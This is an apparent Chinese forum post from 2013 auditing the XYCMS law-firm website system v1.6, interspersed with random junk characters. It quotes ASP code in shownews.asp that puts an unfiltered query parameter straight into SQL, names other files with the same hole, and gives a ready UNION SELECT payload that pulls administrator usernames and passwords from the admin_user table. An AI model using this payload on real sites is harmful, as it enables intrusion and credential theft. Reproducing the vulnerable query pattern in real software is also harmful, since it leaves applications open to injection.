前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
: v: ^/ [# ]) ~" v: D4 n
" R: N* u5 O; e& c+ s* T/ S. y淫荡分割线# k, R/ s: e; y9 g. q/ n. u
--------------------------------------------------------
, ^0 q' c- i' g" G0 g% k, G0 c/ n
$ u* v; m8 I/ B/ ^2 U6 i% F7 {审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)# I# U1 c8 ^# S) n
源码地址:http://down.chinaz.com/soft/29233.htm# |& D1 E$ s8 ]0 A6 Z( A( ]+ t
& x$ R1 G* S% H% U. N1 w9 s漏洞文件:shownews.asp
, m! x' G8 g- a漏洞代码:7-13行) u" t% X2 Y2 \0 M z4 M
+ ~! l+ j' x3 M! v, W# z/ r# l
/ [3 `* X' ?, Z4 [' V
<%
. ^8 y% f0 @4 r; }id=request.QueryString("id")
h. b( q5 }9 a9 j( ^1 {; A ) l1 e/ [# }" _, G
set snews=server.createobject("adodb.recordset") / y" \& p% n6 J7 I: C5 N
exec="select * from [news] where id="&id- _$ S: _- f; s( O3 }1 M0 k5 e- \
snews.open exec,conn,1,1+ H6 U6 g3 }. a% Y/ O
%>7 _2 T$ }, s% h# O& N$ ?, T
% r( Y7 i1 r3 z1 D# w
8 f( i( Y- R* {6 M' c Y- v# E
什么过滤都没有 直造成注入% Y7 D8 G2 a# p C3 l9 O( j' o: p
. O! y9 j n; Q. m4 O: Q. V; b
注入点:http://127.0.0.1:99/shownews.asp?id=xx
' z$ t! Y$ k/ A8 O" S" q2 f( N
, a9 V1 t+ Q, q3 q其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找6 G( o( S4 i2 F9 i* M" a
) Y2 i# W6 C7 d
b7 d0 S! ~, R% ]3 n# X. Jexp: union select 1,admin,password,4,5,7 from admin_user
% }+ E# M( ]1 C% |3 h$ ~$ G, I( {2 p8 z; F- N5 B' }
|
发表于 2013-4-4 17:28:12
收藏
支持
反对